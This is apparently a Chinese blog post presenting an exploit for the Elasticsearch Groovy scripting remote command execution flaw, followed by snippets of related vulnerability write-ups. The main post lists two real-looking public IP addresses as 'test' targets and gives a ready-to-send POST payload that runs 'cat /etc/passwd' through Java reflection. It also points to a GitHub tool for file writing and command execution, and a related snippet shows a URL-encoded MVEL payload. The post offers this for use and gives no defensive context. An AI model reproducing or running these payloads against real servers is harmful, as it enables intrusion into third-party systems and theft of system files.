Elasticsearch Groovy任意命令执行漏洞EXP

最新推荐文章于 2022-11-10 18:13:05 发布
最新推荐文章于 2022-11-10 18:13:05 发布
阅读量403 收藏
点赞数
文章标签: 大数据 java runtime

测试url:http://190.196.67.252:9200/_search?pretty

http://191.234.18.14:9200///_search?pretty

 

POST提交

{“size”:1,”script_fields”: {“iswin”: {“script”:”java.lang.Math.class.forName(\”java.io.BufferedReader\”).getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\”java.io.InputStreamReader\”).getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”cat /etc/passwd\”).getInputStream())).readLines()”,”lang”: “groovy”}}}

 

 

下面直接上EXP

文件写入 管理 命令执行

https://github.com/Svti/ElasticSearchEXP/

weixin_34163741
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ElasticSearch 命令执行漏洞(CVE-2014-3120)
weixin_59086772的博客
01-04 1950
0x00前言 Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。 0x01漏洞原理 ElasticSearch 1.2版本之前支持动态脚本。漏洞是通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码。 0x02影响版本 jre版本:openjdk:8-jre elasticsearch版本:v1.1.1 0x03环境搭建 do
[Vulfocus解题系列]ElasticSearch命令执行漏洞(CVE-2014-3120)
00勇士王子的博客
07-04 1299
漏洞介绍 Elasticsearch 是一个基于 Lucene 库的搜索引擎,具有 HTTP Web 接口和无模式 JSON 文档。Elasticsearch 是用 Java 开发的,其支持 MVEL、js、Java 等语言,其老版本默认语言为 MVEL。 MVEL :一个被众多 Java 项目使用的开源的表达式语言。 Elasticsearch 1.2之前的版本默认配置启用了动态脚本,该脚本允许远程攻击者通过 _search 的 source 参数执行任意 MVEL 表达式和 Java 代码。 影响版本
ElasticSearch 命令执行漏洞 CVE-2014-3120 漏洞测试
ADummy的博客
02-24 310
ElasticSearch 命令执行漏洞(CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 MVEL执行命令的代码如下: import java.io.*; new java.util.Scanner(Runtime.g
Elasticsearch Groovy 远程代码执行漏洞1
08-08
在本文中,我们将探讨 Elasticsearch 中的一个 Groovy 远程代码执行漏洞,该漏洞允许攻击者通过构造恶意请求来执行任意系统命令,从而可能导致严重的信息泄露或系统破坏。这个漏洞主要源于 Elasticsearch 允许用户在...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
elasticsearch常用命令脚本
最新发布
11-26
后端工程师开发时经常需要操作es,要是每次都去找相关命令就太麻烦了。这里提供了常用的es操作脚本,比如删除单个索引、删除多个索引、创建索引、查看全部索引、查看粉刺等等,以及深分页查询脚本
elasticsearch-groovy-1.7.5.jar
05-31
Elasticsearch 的官方 Groovy 客户端 org.elasticsearch/elasticsearch-groovy/1.7.5/elasticsearch-groovy-1.7.5.jar
elasticsearch-groovy-2.0.0-rc1.jar
05-31
Elasticsearch 的官方 Groovy 客户端 org.elasticsearch/elasticsearch-groovy/2.0.0-rc1/elasticsearch-groovy-2.0.0-rc1.jar
Elasticsearch_1.2漏洞利用工具
05-15
Elasticsearch_1.2漏洞利用工具,可以执行命令,上传文件,浏览文件。
Elasticsearch 代码执行漏洞
cnbird's blog
05-29 2084
http://xxx.com:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\nimport%20java.io
利用Vulnhub复现漏洞 - ElasticSearch 命令执行漏洞(CVE-2014-3120)测试环境
JiangBuLiu的博客
07-02 2518
ElasticSearch 命令执行漏洞(CVE-2014-3120)测试环境Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现处理办法 Vulnhub官方复现教程 https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/ 漏洞原理 相关文档:http://bouk.co/blog/elasticsearch-rce/ 、...
ElasticsearchElasticsearch命令行操作
qq_60969145的博客
11-10 2682
集群这一概念已经遍及天下了,在Elasticsearch中也不例外,可以将多台Elasticsearch节点组成集群使用,可以在任意一台节点上进行搜索。
ElasticSearch的常用命令操作
qq_45722267的博客
07-13 4940
本文采用的ElasticSearch和kibana的版本为7.17.3。在ElasticSearch的操作中:搜索Dev Tools 进入到命令栏,即可对Elastic Search进行操作。 green 表示健康, yellow 表示亚健康, red 表示有问题。 三、ElasticSearch的增删查改操作 1、创建数据库 创建game库、consoleGame表、向id为1添加数据 PUT对应的修改内容为全局修改,是新的内容直接覆盖了旧的内容,如果要保持键的内容及数量不变,需要与旧的数据一
ElasticSearch基本命令
wgy0205的博客
04-07 442
ES REST CRUD常用操作: 1、测试服务正常开启: curl -XGET "localhost:9200" 2、查看索引列表: curl -XGET "localhost:9200/_cat/nodes?v" 3、查看索引列表: curl -XGET "localhost:9200/_cat/indices?v...
Elasticsearch基础教程:快速掌握ES语法与索引概念
"这篇资源是针对初学者的Elasticsearch (ES) 语法基础入门教程,涵盖了ES的安装、基本特性和DSL语法,同时也讲解了Kibana的使用。此外,教程还深入介绍了搜索引擎和倒排索引的概念,旨在帮助初学者快速掌握搜索引擎...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值